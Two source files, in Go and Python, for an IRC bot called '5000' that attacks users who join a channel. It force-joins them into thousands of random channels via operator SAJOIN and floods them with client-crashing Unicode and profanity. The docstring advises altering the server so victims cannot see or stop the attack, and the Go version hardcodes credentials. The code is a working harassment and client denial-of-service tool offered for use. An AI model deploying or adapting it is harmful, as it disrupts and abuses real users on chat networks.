File: bots/5000.go
package main

// Original 5000 bot was written in Python. This is a Go port of it by acidvegas.

import (
	"bufio"
	"crypto/tls"
	"fmt"
	"log"
	"math/rand"
	"strings"
	"time"
	"unicode/utf16"
)

var sendChannel chan<- string

const (
	nickname = "FUCKYOU"
	username = "5000"
	realname = "\x0304THROWN INTO THE FUCKING WALL\x0f"
)

func randomASCIIString(n int) string {
	const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
	b := make([]byte, n)
	for i := range b {
		b[i] = charset[rand.Intn(len(charset))]
	}
	return string(b)
}

func unicodeString() string {
	msg := "\u202e\u0007\x03" + fmt.Sprintf("%d", rand.Intn(12)+2)
	for i := 0; i < rand.Intn(101)+200; i++ {
		r := rand.Intn(0x2001) + 0x1000
		if r < 0x10000 {
			msg += string(rune(r))
		} else {
			r -= 0x10000
			msg += string(utf16.DecodeRune(rune(r>>10+0xD800), rune(r&0x3FF+0xDC00)))
		}
	}
	return msg
}

func attack(target string) {
	sendChannel <- fmt.Sprintf("PRIVMSG #superbowl :I am fucking the shit out of %s right now...", target)
	for i := 0; i < 200; i++ {
		var channels []string
		for i := 0; i < 25; i++ {
			channelName := "#" + randomASCIIString(5)
			channels = append(channels, channelName)
		}
		result := strings.Join(channels, ",")
		sendChannel <- fmt.Sprintf("SAJOIN %s #%s", target, result)
		sendChannel <- fmt.Sprintf("PRIVMSG #5000 :%s oh god %s what is happening %s", unicodeString(), target, unicodeString())
		sendChannel <- fmt.Sprintf("PRIVMSG %s :%s oh god %s what is happening %s", target, unicodeString(), target, unicodeString())
	}
}

func main() {
	rand.Seed(time.Now().UnixNano())

	for {
		conn, err := tls.Dial("tcp", "localhost:6697", &tls.Config{InsecureSkipVerify: true})
		if err != nil {
			log.Println("Failed to connect: %v", err)
			time.Sleep(15 * time.Second)
			continue
		}

		messageChannel := make(chan string, 100) // INCOMING
		sendChannel := make(chan string, 100)    // OUTGOING
		quit := make(chan struct{})

		timeoutDuration := 300 * time.Second
		timeoutTimer := time.NewTimer(timeoutDuration)

		go func() {
			reader := bufio.NewReader(conn)
			for {
				line, err := reader.ReadString('\n')
				if err != nil {
					log.Println("Error reading from server:", err)
					conn.Close()
					close(quit)
					return
				}
				select {
				case messageChannel <- line:
					timeoutTimer.Reset(timeoutDuration)
				case <-quit:
					return
				case <-timeoutTimer.C:
					log.Println("No data received for 300 seconds. Reconnecting...")
					conn.Close()
					close(quit)
					return
				}
			}
		}()

		go func() {
			for {
				select {
				case message := <-sendChannel:
					data := []byte(message)
					if len(data) > 510 {
						data = data[:510]
					}
					_, err := conn.Write(append(data, '\r', '\n'))
					if err != nil {
						log.Println("Error writing to server:", err)
						conn.Close()
						close(quit)
						return
					}
				case <-quit:
					return
				}
			}
		}()

		sendChannel <- fmt.Sprintf("NICK FUCKYOU")
		sendChannel <- fmt.Sprintf("USER 5000 0 * :THROW INTO THE FUCKING WALL")

		for {
			handleMessage(<-messageChannel, sendChannel)
		}

		conn.Close()
		//close(quit)
		time.Sleep(15 * time.Second)
	}
}

func handleMessage(message string, sendChannel chan<- string) {
	fmt.Println(message)
	parts := strings.Split(message, " ")
	if len(parts) > 1 && parts[0] == "PING" {
		sendChannel <- fmt.Sprintf("PONG %s", parts[1])
	} else if len(parts) > 2 && parts[1] == "001" {
		time.Sleep(5 * time.Second)
		sendChannel <- fmt.Sprintf("MODE FUCKYOU +BDd")
		sendChannel <- fmt.Sprintf("PRIVMSG NickServ IDENTIFY FUCKYOU simps0nsfan420")
		sendChannel <- fmt.Sprintf("PRIVMSG OPER FUCKYOU fartsimps0n420")
		sendChannel <- fmt.Sprintf("JOIN #5000")
		sendChannel <- fmt.Sprintf("JOIN #superbowl")
	} else if len(parts) == 3 {
		if parts[1] == "JOIN" && parts[2] == "#5000" {
			nick := strings.Split(parts[0], "!")[0][1:]
			if nick != "acidvegas" && nick != "ChanServ" && nick != "FUCKYOU" {
				go attack(nick)
			}
		}
	}
}

File: bots/5000.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 5000 IRC Bot - Developed by acidvegas in Python (https://git.acid.vegas/supertools)

'''
This bot requires network operator privledges in order to use the SAJOIN command.
The bot will idle in the #5000 channel and #superbowl.
Anyone who joins the #5000 channel will be force joined into 5000 random channels.
It will also spam corrupting unicode that lags some IRC clients.
It will announce in #superbowl who joins the #5000 channel.
The command .kills can be used to see how many people have been 5000'd.
Join #5000 on irc.supernets.org for an example of what this does to an IRC client.
Modify your IRCd to not send a NOTICE on SAJOIN so people will not be able to mitigate it.
Bot is setup to handle abuse, aka people clone flooding in #5000 to try and break the bot.
'''

import os
import random
import socket
import string
import ssl
import time
import threading

nickserv_password='CHANGEME'
operator_password='CHANGEME'

def rnd():
	return ''.join(random.choice(string.ascii_letters) for _ in range(random.randint(4, 8)))

def unicode():
	msg='\u202e\u0007\x03' + str(random.randint(2,13))
	for i in range(random.randint(200, 300)):
		msg += chr(random.randint(0x1000,0x3000))
	return msg

def attack(nick):
	try:
		raw(f'PRIVMSG #superbowl :I am fucking the shit out of {nick} right now...')
		count += 1
		if not count % 10:
			with open(log, 'w') as log_file:
				log_file.write(count)
		for i in range(200):
			if nick not in nicks:
				break
			else:
				channels = ','.join(('#' + rnd() for x in range(25)))
				raw(f'SAJOIN {nick} {channels}')
				raw(f'PRIVMSG #5000 :{unicode()} oh god {nick} what is happening {unicode()}')
				raw(f'PRIVMSG {nick} :{unicode()} oh god {nick} what is happening {unicode()}')
				time.sleep(0.3)
	except:
		pass
	finally:
		if nick in nicks:
			nicks.remove(nick)

def raw(msg):
	sock.send(bytes(msg + '\r\n', 'utf-8'))

# Main
log   = os.path.join(os.path.dirname(os.path.realpath(__file__)), '5000.log')
last  = 0
nicks = list()
if not os.path.isfile(log):
	open(log, 'w').write('0')
	count = 0
else:
	count = open(log).read()
while True:
	try:
		sock = ssl.wrap_socket(socket.socket())
		sock.connect(('localhost', 6697))
		raw('USER 5000 0 * :THROWN INTO THE FUCKING WALL')
		raw('NICK FUCKYOU')
		while True:
			try:
				data = sock.recv(1024).decode('utf-8')
				for line in (line for line in data.split('\r\n') if len(line.split()) >= 2):
					print('{0} | [~] - {1}'.format(time.strftime('%I:%M:%S'), line))
					args = line.split()
					if line.startswith('ERROR :Closing Link:'):
						raise Exception('Connection has closed.')
					elif args[0] == 'PING':
						raw('PONG ' + args[1][1:])
					elif args[1] == '001':
						raw('MODE FUCKYOU +BDd')
						raw('PRIVMSG NickServ IDENTIFY FUCKYOU ' + nickserv_password)
						raw('OPER 5000 ' + operator_password)
						raw('JOIN #superbowl')
						raw('JOIN #5000')
					elif args[1] == '401' and len(args) >= 4:
						nick = args[3]
						if nick in nicks:
							nicks.remove(nick)
					elif args[1] == 'JOIN' and len(args) == 3:
						nick = args[0].split('!')[0][1:]
						chan = args[2][1:]
						if chan == '#5000' and nick not in ('acidvegas', 'ChanServ', 'FUCKYOU') and len(nicks) < 3 and nick not in nicks:
							nicks.append(nick)
							threading.Thread(target=attack, args=(nick,)).start()
					elif args[1] == 'PRIVMSG' and len(args) == 4:
						chan = args[2][1:]
						msg  = ' '.join(args[3:])[1:]
						if chan == '#superbowl' and msg == '.kills' and time.time() - last > 3:
							raw('PRIVMSG #superbowl :' + str(count))
							last = time.time()
			except (UnicodeDecodeError, UnicodeEncodeError):
				pass
	except:
		sock.close()
	finally:
		time.sleep(15)